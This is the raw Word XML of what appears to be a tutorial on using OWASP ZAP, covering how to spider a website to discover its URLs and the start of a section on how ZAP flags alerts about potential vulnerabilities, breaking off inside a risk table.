    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="6C948E42" w14:textId="384112EA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="76CEA4DD" w:rsidP="764D761D" w:rsidRDefault="76CEA4DD" w14:paraId="6B3B5EC6" w14:textId="745C3184">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="76CEA4DD">
        <w:drawing>
          <wp:inline wp14:editId="435BF96B" wp14:anchorId="4D9C74A0">
            <wp:extent cx="3188907" cy="1607741"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4309" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rae3d7396b9194c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88907" cy="1607741"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="76CEA4DD" w:rsidP="764D761D" w:rsidRDefault="76CEA4DD" w14:paraId="50757801" w14:textId="6FEF62F6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="76CEA4DD">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>Request in OWASP tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="76CEA4DD" w:rsidP="764D761D" w:rsidRDefault="76CEA4DD" w14:paraId="4E72C1DC" w14:textId="2ABD9619">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="76CEA4DD">
        <w:drawing>
          <wp:inline wp14:editId="2CA413D4" wp14:anchorId="7FB8A7C1">
            <wp:extent cx="4563666" cy="2433955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="339261556" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R2fbdcc8fa85d44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63666" cy="2433955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="4478DB43" w:rsidP="764D761D" w:rsidRDefault="4478DB43" w14:paraId="53B24197" w14:textId="22FC68C2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="4478DB43">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>Go to Sites tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4478DB43" w:rsidP="764D761D" w:rsidRDefault="4478DB43" w14:paraId="19F01325" w14:textId="41F9BC1A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4478DB43">
        <w:drawing>
          <wp:inline wp14:editId="050638B9" wp14:anchorId="1B19E3E5">
            <wp:extent cx="4572000" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1930402310" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R09064f2a3c5941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47925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="548029E1" w14:textId="0AD658D2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="449E37A7" w:rsidRDefault="5D3B8CE6" w14:paraId="7B2FF59C" w14:textId="6384F7AB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="002060" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="66812364">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Spidering a Website with OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C8426BE" w:rsidP="449E37A7" w:rsidRDefault="2C8426BE" w14:paraId="3D2CF890" w14:textId="57A5FE01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Spidering allows you to launch an automated scan </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="71E2AA64">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>against</w:t>
      </w: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 xml:space="preserve"> application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C8426BE" w:rsidP="449E37A7" w:rsidRDefault="2C8426BE" w14:paraId="55F152DC" w14:textId="1694EA49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Spider explores by finding links in HTML pages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C8426BE" w:rsidP="449E37A7" w:rsidRDefault="2C8426BE" w14:paraId="051FFC70" w14:textId="0216C74F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">it begins with </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="345123AB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set of</w:t>
      </w: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 xml:space="preserve"> URLs called seeds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C8426BE" w:rsidP="449E37A7" w:rsidRDefault="2C8426BE" w14:paraId="36B89D28" w14:textId="7BCA8A76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">The spider then visits these URLs, </w:t>
      </w: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identifies</w:t>
      </w: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 xml:space="preserve"> all the hyperlinks in the pages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C8426BE" w:rsidP="449E37A7" w:rsidRDefault="2C8426BE" w14:paraId="4B16AC27" w14:textId="3D126191">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Adds them to the list of URLs to visit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C8426BE" w:rsidP="449E37A7" w:rsidRDefault="2C8426BE" w14:paraId="68211461" w14:textId="3D279293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">The process continues recursively </w:t>
      </w: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as long as</w:t>
      </w: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 xml:space="preserve"> </w:t>
      </w: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new resources</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2C8426BE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="764D761D" w:rsidRDefault="5D3B8CE6" w14:paraId="7D1F07BA" w14:textId="548D0280">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="35E26198" w:rsidP="764D761D" w:rsidRDefault="35E26198" w14:paraId="68F9097C" w14:textId="6F7FA7A5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="35E26198">
        <w:drawing>
          <wp:inline wp14:editId="4C448250" wp14:anchorId="2217642B">
            <wp:extent cx="4572000" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1586219732" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1271d1a119ac45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57450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="097CC6D8" w:rsidP="764D761D" w:rsidRDefault="097CC6D8" w14:paraId="678B51BF" w14:textId="6A3A077A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="53B20143">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>Select any URL right click on the URL &gt; Attack &gt; Spider</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="29E3D852" w:rsidP="764D761D" w:rsidRDefault="29E3D852" w14:paraId="4EDA70DE" w14:textId="42710FEF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="53B20143">
        <w:drawing>
          <wp:inline wp14:editId="7552A4B7" wp14:anchorId="30072E0E">
            <wp:extent cx="4572000" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1284505998" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R86217e2ba0c54e76">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29E3D852" w:rsidP="764D761D" w:rsidRDefault="29E3D852" w14:paraId="5ECA4C75" w14:textId="0D0E16AE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="53B20143">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Spider attack </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="1629A597">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="040C28"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">automatically discover </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="1629A597">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="040C28"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new resources</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="1629A597">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="040C28"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URLs) on a particular Site</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="1629A597">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="474747"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="53B20143">
        <w:drawing>
          <wp:inline wp14:editId="5D20AD64" wp14:anchorId="44383F92">
            <wp:extent cx="4040188" cy="2129515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="800962245" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R9acbe0fffd6e46b8">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4040188" cy="2129515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="29E3D852">
        <w:drawing>
          <wp:inline wp14:editId="539ECC32" wp14:anchorId="53710E12">
            <wp:extent cx="3989431" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="412342413" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1b63bc6cbb594c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89431" cy="2717800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="4AB8E2AA" w14:textId="6C598B5D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C6DE471" w:rsidP="764D761D" w:rsidRDefault="0C6DE471" w14:paraId="5F67B3DB" w14:textId="31511620">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="0C6DE471">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rPr>
        <w:t>Alerts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C6DE471" w:rsidP="764D761D" w:rsidRDefault="0C6DE471" w14:paraId="36229BFC" w14:textId="07860281">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64D761D" w:rsidR="0C6DE4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An alert is a potential vulnerability and is associated with a specific request.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="0C6DE4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A request can have more than one alert.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C6DE471" w:rsidP="764D761D" w:rsidRDefault="0C6DE471" w14:paraId="78463A29" w14:textId="53D6E398">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764D761D" w:rsidR="0C6DE4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Alerts are shown in the UI with a flag </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="0C6DE4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indicating</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="0C6DE47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the risk:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr w:rsidR="764D761D" w:rsidTr="55820FFD" w14:paraId="1E1C9A08">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="6B89A8A8" w14:textId="65EA5892">
            <w:pPr>
              <w:rPr>
